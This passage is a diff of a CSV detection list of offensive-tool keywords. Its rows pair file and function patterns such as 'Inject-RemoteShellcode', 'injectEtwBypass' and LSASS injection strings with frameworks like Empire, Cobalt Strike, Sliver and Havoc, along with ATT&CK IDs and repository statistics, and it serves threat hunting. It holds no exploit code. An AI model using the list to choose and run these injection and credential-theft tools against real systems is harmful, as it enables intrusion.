TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*InjectDll.vcxproj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*injected into LSASS*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","New-HoneyHash.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Inject-BypassStuff*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*InjectDll.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*InjectDll.vcxproj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*injected into LSASS*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","New-HoneyHash.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*InjectedCredentials.csv*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*injectEtwBypass*","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","253","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z" -"*inject-etw-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*inject-etw-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*injectify*","offensive_tool_keyword","injectify","Perform advanced MiTM attacks on websites with ease.","T1557.001 - T1190 - T1071.001 - T1056.001","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/samdenty/injectify","1","0","N/A","N/A","7","650","122","2022-07-20T15:02:37Z","2017-11-06T17:01:50Z" -"*Injection* -ProcName lsass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PSInject.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Injection\Spawn32*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Injection\Spawn64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Injection-Exploit-1.0-SNAPSHOT-all.jar*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","715","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" -"*Injections/Traversal.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*Injections/XSS.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*Inject-LocalShellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Injection* -ProcName lsass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PSInject.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Injection\Spawn32*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Injection\Spawn64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Injection-Exploit-1.0-SNAPSHOT-all.jar*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","716","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" +"*Injections/Traversal.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*Injections/XSS.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*Inject-LocalShellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*InjectMate.py*","offensive_tool_keyword","burpsuite","Multi-tabbed extension that helps generate payloads for various purposes (XSS. SQLi. Header injection. and more).","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*InjectMateCommunity.py*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*Injector.exe*","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 / SMBGhost Expected outcome: cmd.exe launched with system access","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","3","242","90","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z" -"*injector.ps1*.kirbi*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","262","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*injector.ps1*.kirbi*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*InjectPERemote.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*InjectPEWMIFSRemote*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*InjectProc*","offensive_tool_keyword","InjectProc","Process injection is a very popular method to hide malicious behavior of code and are heavily used by malware authors.There are several techniques. which are commonly used: DLL injection. process replacement (a.k.a process hollowing). hook injection and APC injection.","T1055 - T1055.012 - T1055.001 - T1055.003","TA0002 - TA0003 - TA0004 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secrary/InjectProc","1","0","N/A","N/A","10","981","225","2019-02-10T11:05:15Z","2017-05-26T08:08:20Z" "*injectremote.boo*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*Inject-RemoteShellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*inject-shellcode *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Inject-RemoteShellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 